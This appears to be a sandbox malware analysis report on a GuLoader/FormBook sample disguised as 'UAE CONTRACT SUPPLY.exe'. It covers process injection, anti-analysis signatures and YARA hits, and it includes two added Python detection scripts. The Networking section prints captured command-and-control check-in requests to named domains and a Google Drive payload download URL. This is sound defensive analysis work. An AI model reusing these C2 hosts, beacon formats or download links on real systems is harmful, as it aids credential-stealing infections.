
Analysis Report UAE CONTRACT SUPPLY.exe

Overview

General Information

Sample Name: UAE CONTRACT SUPPLY.exe
Analysis ID: 358403
MD5: 9da74a6d583c801677c0e2fde51586ba
SHA1: e1af77b99ca69e4737fa4d73a77e5702d5c13e91
SHA256: 9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
Tags: exe

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • UAE CONTRACT SUPPLY.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
    • UAE CONTRACT SUPPLY.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: 9DA74A6D583C801677C0E2FDE51586BA)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • chkdsk.exe (PID: 392 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5048 cmdline: /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
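
The Startup tree above is the whole infection chain in miniature: the downloader re-executes itself, the second instance injects into the already-running explorer.exe (the report's thread/APC injection signatures), explorer.exe then starts two SysWOW64 maintenance utilities (autoconv.exe, chkdsk.exe) whose memory carries the FormBook Yara hits, and chkdsk.exe finally removes the original sample through cmd.exe. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds the parent/child tree from process-creation records and flags those three patterns. The record format, the parent PID of explorer.exe and the assumption that explorer.exe launched PID 6848 from the Desktop are this example's own; the PIDs, images and command lines are taken from the Startup section.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names are this example's own, not a real log schema)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's Startup tree. explorer.exe was already running when the
# sample started; its parent PID (0) and the Desktop launch of PID 6848 by explorer.exe
# are assumptions, everything else is as listed in the report.
EVENTS = [
    ProcEvent(3440, 0, r"C:\Windows\explorer.exe", ""),
    ProcEvent(6848, 3440, r"C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe",
              r"'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'"),
    ProcEvent(6952, 6848, r"C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe",
              r"'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'"),
    ProcEvent(4804, 3440, r"C:\Windows\SysWOW64\autoconv.exe", r"C:\Windows\SysWOW64\autoconv.exe"),
    ProcEvent(392, 3440, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    ProcEvent(5048, 392, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'"),
    ProcEvent(1068, 5048, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Maintenance utilities that have no business being started by explorer.exe with no arguments.
# The set is this example's choice, seeded from the two images hollowed in this report.
HOLLOW_HOSTS = {"chkdsk.exe", "autoconv.exe"}

# "cmd /c del <path>" with optional single or double quotes around the path.
DEL_RE = re.compile(r"/c\s+del\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_profile(path: str) -> bool:
    return "\\users\\" in path.lower()


def analyze(events):
    """Return human-readable findings for the three patterns in the report's process tree."""
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # R1: a binary under C:\Users re-launches its own image (the downloader's second stage).
        if parent and parent.image.lower() == e.image.lower() and in_user_profile(e.image):
            findings.append(f"R1 self-spawn pid={e.pid} ppid={e.ppid} image={basename(e.image)}")
        # R2: explorer.exe starts a SysWOW64 maintenance tool with an empty argument list.
        if parent and basename(parent.image) == "explorer.exe" and basename(e.image) in HOLLOW_HOSTS:
            args = e.cmdline.strip().strip("'\"")
            if args == "" or args.lower() == e.image.lower():
                findings.append(f"R2 explorer->{basename(e.image)} pid={e.pid} without arguments")
        # R3: cmd.exe deleting a file that is the image of another process in the tree.
        if basename(e.image) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and m.group(1).lower() in known_images:
                findings.append(f"R3 self-delete pid={e.pid} target={basename(m.group(1))}")
    return findings


if __name__ == "__main__":
    for line in analyze(EVENTS):
        print(line)
```

R2 is the noisiest of the three on a real fleet (explorer.exe does launch chkdsk.exe when a user clicks through the disk-properties dialog, but then with arguments), so treat it as a scoring signal and let R1 and R3 carry the verdict.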

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp
  Rule: LokiBot_Dropper_Packed_R11_Feb18 (Auto-generated rule - file scan copy.pdf.r11; author: Florian Roth)
  • 0x5434:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
(19 entries in total; the remainder are not shown on this page)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: UAE CONTRACT SUPPLY.exe; Virustotal: Detection: 33%
Source: UAE CONTRACT SUPPLY.exe; ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match; File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
Source: 16.2.chkdsk.exe.5bc7960.5.unpack; Avira: Label: TR/Dropper.Gen
Source: 16.2.chkdsk.exe.fd4f08.1.unpack; Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: UAE CONTRACT SUPPLY.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
Source: global traffic; HTTP traffic detected:
  GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
  Host: www.aserchofalltrades.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
  Host: www.parentseducationalco-op.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
  Host: www.allsalesvinyl.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1
  Host: www.pardsoda.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1
  Host: www.sixteen3handscottages.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View; IP Address: 34.102.136.180
Source: Joe Sandbox View; ASN Name: WIX_COMIL
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS traffic detected: queries for: doc-08-78-docs.googleusercontent.com
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 25 Feb 2021 14:28:15 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-wix-request-id: 1614263295.2061857739024538739
  vary: Accept-Encoding
  Age: 0
  X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==
  Server: Pepyaka/1.15.10
  Data Ascii (body, truncated): b93 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollo
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp; Strings found in binary or memory:
  http://fontfabrik.com
  http://www.apache.org/licenses/LICENSE-2.0
  http://www.carterandcone.coml
  http://www.fontbureau.com
  http://www.fontbureau.com/designers
  http://www.fontbureau.com/designers/?
  http://www.fontbureau.com/designers/cabarga.htmlN
  http://www.fontbureau.com/designers/frere-jones.html
  http://www.fontbureau.com/designers8
  http://www.fontbureau.com/designers?
  http://www.fontbureau.com/designersG
  http://www.fonts.com
  http://www.founder.com.cn/cn
  http://www.founder.com.cn/cn/bThe
  http://www.founder.com.cn/cn/cThe
  http://www.galapagosdesign.com/DPlease
  http://www.galapagosdesign.com/staff/dennis.htm
  http://www.goodfont.co.kr
  http://www.jiyu-kobo.co.jp/
  http://www.sajatypeworks.com
  http://www.sakkal.com
  http://www.sandoll.co.kr
  http://www.tiro.com
  http://www.typography.netD
  http://www.urwpp.deDPlease
  http://www.zhongyicts.com.cn
Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: UAE CONTRACT SUPPLY.exe; String found in binary or memory: https://drive.google.com/uc?export=download&id=1tH9Kn1AiB6JALzFxr9xEwyDe2gfOw8eq
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2
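
All five check-ins listed above share one shape: a GET to a short path (/w25t/), a query with exactly two parameters, one a fixed 16-character token (wj=hBZ8sVLxwZopBdRp) and one an opaque base64 blob under a second key (7nf0kP), Connection: close, and no User-Agent header; only the Host changes as the bot cycles through its domain list. The Python below is an added example, not part of the Joe Sandbox report and not the logic of the ET Snort rules that fired: it parses raw request text, applies those visible features as a heuristic, and clusters the hits by path and static token so the constant pieces can be used as a hunting pivot across hosts. The five request texts are reconstructed from the requests listed above; the sixth, benign request is constructed as a negative control.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Reconstructed from the five GET requests in the Networking section (Host, Connection: close,
# no User-Agent), plus one constructed benign request as a negative control.
REQUESTS = [
    "GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1\r\n"
    "Host: www.aserchofalltrades.com\r\nConnection: close\r\n\r\n",
    "GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1\r\n"
    "Host: www.parentseducationalco-op.com\r\nConnection: close\r\n\r\n",
    "GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1\r\n"
    "Host: www.allsalesvinyl.net\r\nConnection: close\r\n\r\n",
    "GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1\r\n"
    "Host: www.pardsoda.com\r\nConnection: close\r\n\r\n",
    "GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1\r\n"
    "Host: www.sixteen3handscottages.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]

SHORT_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # e.g. /w25t/
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")        # standard base64 alphabet with padding


def parse_request(raw):
    """Split raw HTTP request text into (method, target, headers); header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(query):
    """Split a query string without percent/plus decoding, so base64 '+' and '/' survive intact."""
    pairs = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        pairs[key] = value
    return pairs


def formbook_checkin(raw):
    """Heuristic match for the check-in shape seen in this report; returns a dict or None."""
    method, target, headers = parse_request(raw)
    if method != "GET" or "user-agent" in headers or headers.get("connection", "").lower() != "close":
        return None
    url = urlsplit(target)
    if not SHORT_PATH_RE.match(url.path):
        return None
    params = split_query(url.query)
    if len(params) != 2:
        return None
    # One short alphanumeric token that stays constant, one long base64 blob that varies.
    static = [(k, v) for k, v in params.items() if v.isalnum() and 8 <= len(v) <= 24]
    blob = [(k, v) for k, v in params.items() if len(v) >= 40 and B64_RE.match(v)]
    if len(static) != 1 or len(blob) != 1:
        return None
    return {
        "host": headers.get("host", ""),
        "path": url.path,
        "static_key": static[0][0],
        "static_value": static[0][1],
        "blob_key": blob[0][0],
        "blob_len": len(blob[0][1]),
    }


def cluster(raws):
    """Group matching requests by (path, static key, static value), the parts that do not change."""
    groups = defaultdict(list)
    for raw in raws:
        hit = formbook_checkin(raw)
        if hit:
            groups[(hit["path"], hit["static_key"], hit["static_value"])].append(hit["host"])
    return {key: sorted(hosts) for key, hosts in groups.items()}


if __name__ == "__main__":
    for key, hosts in cluster(REQUESTS).items():
        print(key, hosts)
```

The blob is left opaque on purpose: nothing on this page says how it is encoded beyond the base64 wrapper, so the detection keys only on structure. In a proxy or NetFlow pipeline the cluster key is what you would hunt on next, since the path and the static token are shared by every host the bot tried while the Host values were all different.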

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe; Code functions (process 1, run 2):
  1_2_02266266 NtResumeThread,
  1_2_0226054E EnumWindows,NtSetInformationThread,
  1_2_02262592 NtWriteVirtualMemory,
  1_2_02265DCB NtProtectVirtualMemory,
  1_2_02266629 NtResumeThread,
  1_2_02260636 NtSetInformationThread,
  1_2_0226263A NtWriteVirtualMemory,
  1_2_02263606 NtSetInformationThread,LoadLibraryA,
  1_2_0226626E NtResumeThread,
  1_2_0226066A NtSetInformationThread,
  1_2_02262644 NtWriteVirtualMemory,
  1_2_0226065C NtSetInformationThread,
  1_2_022606A9 NtSetInformationThread,
  1_2_02260682 NtSetInformationThread,
  1_2_02260690 NtSetInformationThread,
  1_2_0226629C NtResumeThread,
  1_2_02262698 NtWriteVirtualMemory,
  1_2_022606EA NtSetInformationThread,
  1_2_022662EA NtResumeThread,
  1_2_022626FD NtWriteVirtualMemory,
  1_2_022662C5 NtResumeThread,
  1_2_022652C8 NtSetInformationThread,
  1_2_02266335 NtResumeThread,
  1_2_02262764 NtWriteVirtualMemory,
  1_2_022663A0 NtResumeThread,
  1_2_022663AA NtResumeThread,
  1_2_022663F8 NtResumeThread,
  1_2_022627DA NtWriteVirtualMemory,
  1_2_0226283B NtWriteVirtualMemory,
  1_2_0226641E NtResumeThread,
  1_2_02265040 NtSetInformationThread,
  1_2_02266455 NtResumeThread,
  1_2_022664A4 NtResumeThread,
  1_2_022628BC NtWriteVirtualMemory,
  1_2_022664FB NtResumeThread,
  1_2_02266566 NtResumeThread,
  1_2_02262942 NtWriteVirtualMemory,
  1_2_022629BD NtWriteVirtualMemory,
  1_2_022625E5 NtWriteVirtualMemory,
  1_2_022605D4 NtSetInformationThread,
  1_2_022605D0 NtSetInformationThread,
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe; Code functions (process 3, run 2):
  3_2_1E509660 NtAllocateVirtualMemory,LdrInitializeThunk,
  3_2_1E5096E0 NtFreeVirtualMemory,LdrInitializeThunk,
  3_2_1E509710 NtQueryInformationToken,LdrInitializeThunk,
  3_2_1E509FE0 NtCreateMutant,LdrInitializeThunk,
  3_2_1E509780 NtMapViewOfSection,LdrInitializeThunk,
  3_2_1E5097A0 NtUnmapViewOfSection,LdrInitializeThunk,
  3_2_1E509540 NtReadFile,LdrInitializeThunk,
  3_2_1E509A50 NtCreateFile,LdrInitializeThunk,
  3_2_1E509A00 NtProtectVirtualMemory,LdrInitializeThunk,
  3_2_1E509A20 NtResumeThread,LdrInitializeThunk,
  3_2_1E509840 NtDelayExecution,LdrInitializeThunk,
  3_2_1E509860 NtQuerySystemInformation,LdrInitializeThunk,
  3_2_1E5098F0 NtReadVirtualMemory,LdrInitializeThunk,
  3_2_1E509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
  3_2_1E5099A0 NtCreateSection,LdrInitializeThunk,
  3_2_1E509650 NtQueryValueKey,
  3_2_1E509670 NtQueryInformationProcess,
  3_2_1E509610 NtEnumerateValueKey,
  3_2_1E5096D0 NtCreateKey,
  3_2_1E50A770 NtOpenThread,
  3_2_1E509770 NtSetInformationFile,
  3_2_1E509760 NtOpenProcess,
  3_2_1E50A710 NtOpenProcessToken,
  3_2_1E509730 NtQueryVirtualMemory,
  3_2_1E509560 NtWriteFile,
  3_2_1E50AD30 NtSetContextThread,
  3_2_1E509520 NtWaitForSingleObject,
  3_2_1E5095D0 NtClose,
  3_2_1E5095F0 NtQueryInformationFile,
  3_2_1E509A10 NtQuerySection,
  3_2_1E509A80 NtOpenDirectoryObject,
  3_2_1E509B00 NtSetValueKey,
  3_2_1E50A3B0 NtGetContextThread,
  3_2_1E50B040 NtSuspendThread,
  3_2_1E509820 NtEnumerateKey,
  3_2_1E5098A0 NtWriteVirtualMemory,
  3_2_1E509950 NtQueueApcThread,
  3_2_1E5099D0 NtCreateProcessEx,
  3_2_00565DCB NtProtectVirtualMemory,
  3_2_00566266 NtQueryInformationProcess,
  3_2_00566455 NtQueryInformationProcess,
  3_2_0056641E NtQueryInformationProcess,
  3_2_005664FB NtQueryInformationProcess,
  3_2_005664A4 NtQueryInformationProcess,
  3_2_00566566 NtQueryInformationProcess,
  3_2_0056626E NtQueryInformationProcess,
  3_2_00566629 NtQueryInformationProcess,
  3_2_005662C5 NtQueryInformationProcess,
  3_2_005662EA NtQueryInformationProcess,
  3_2_0056629C NtQueryInformationProcess,
  3_2_00566335 NtQueryInformationProcess,
  3_2_005663F8 NtQueryInformationProcess,
  3_2_005663A0 NtQueryInformationProcess,
  3_2_005663AA NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F95D0 NtClose,LdrInitializeThunk,
